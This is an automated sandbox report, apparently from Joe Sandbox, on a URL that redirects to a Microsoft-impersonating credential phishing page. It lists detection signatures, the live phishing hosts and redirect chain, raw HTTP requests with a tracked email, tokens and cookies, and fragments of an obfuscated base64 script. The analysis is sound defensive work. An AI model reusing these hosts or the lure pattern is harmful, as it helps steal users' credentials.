Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://adrianocarreira.com/team/index.html

Overview

General Information

Sample URL:https://adrianocarreira.com/team/index.html
Analysis ID:1564020
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Yara detected HtmlPhish54
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains obfuscated script src
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 4540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1956,i,5367884434613329053,5550688363984249311,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 7132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://adrianocarreira.com/team/index.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_57JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    0.1.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      0.10.i.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        2.1.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          3.2.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            3.3.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
              Click to see the 2 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://adrianocarreira.com/team/index.htmlSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

              Phishing

              barindex
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'documerger.afua.com.br' does not match the legitimate domain for Microsoft., The domain 'afua.com.br' does not have any known association with Microsoft., The presence of a subdomain 'documerger' and the use of a Brazilian domain extension '.com.br' are suspicious and not typical for Microsoft services., The email address 'u9s7oo@vlxwrxa.org' does not appear to be associated with Microsoft, adding to the suspicion. DOM: 3.4.pages.csv
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_57, type: DROPPED
              Source: Yara matchFile source: 0.1.id.script.csv, type: HTML
              Source: Yara matchFile source: 0.10.i.script.csv, type: HTML
              Source: Yara matchFile source: 2.1.pages.csv, type: HTML
              Source: Yara matchFile source: 3.2.pages.csv, type: HTML
              Source: Yara matchFile source: 3.3.pages.csv, type: HTML
              Source: Yara matchFile source: 3.5.pages.csv, type: HTML
              Source: https://adrianocarreira.com/team/index.htmlHTTP Parser: Number of links: 0
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: Number of links: 1
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.orgHTTP Parser: Base64 decoded: function c(){if(!document.querySelector(".b") || !document.querySelector(".g")){document.head.appendChild(Object.assign(document.createElement("div"),{classList:["b"]}));document.documentElement.style.filter="hue-rotate(4deg)";document.head.appendChild(Ob...
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.orgHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
              Source: https://adrianocarreira.com/team/index.htmlHTTP Parser: Title: ****---*** does not match URL
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: <input type="password" .../> found
              Source: https://adrianocarreira.com/team/index.htmlHTTP Parser: No favicon
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.orgHTTP Parser: No favicon
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No favicon
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No favicon
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No favicon
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No favicon
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No favicon
              Source: https://adrianocarreira.com/team/index.htmlHTTP Parser: No <meta name="author".. found
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://adrianocarreira.com/team/index.htmlHTTP Parser: No <meta name="copyright".. found
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49864 version: TLS 1.2
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /team/index.html HTTP/1.1Host: adrianocarreira.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: adrianocarreira.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://adrianocarreira.com/team/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yxKAAfE1arTmDDx&MD=11F9SbpG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /?jjzzxogc&email=u9s7oo@vlxwrxa.org HTTP/1.1Host: documerge.arroiodosilva.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://adrianocarreira.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvY3VtZXJnZXIuYWZ1YS5jb20uYnIvIiwiZG9tYWluIjoiZG9jdW1lcmdlci5hZnVhLmNvbS5iciIsImtleSI6Imt1SkZ5Q3YyeWt0VCIsInFyYyI6InU5czdvb0B2bHh3cnhhLm9yZyIsImlhdCI6MTczMjcyNzM4OCwiZXhwIjoxNzMyNzI3NTA4fQ.3Glfdu1-h4hcJLG6frjQG7LUrGE0ClWKXeH5CYKR-jk HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://adrianocarreira.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /?auth=2&qrc=u9s7oo%40vlxwrxa.org HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://adrianocarreira.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.orgAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; fpc=AnIF4PXDa21Bo9TCi_D-hPs; 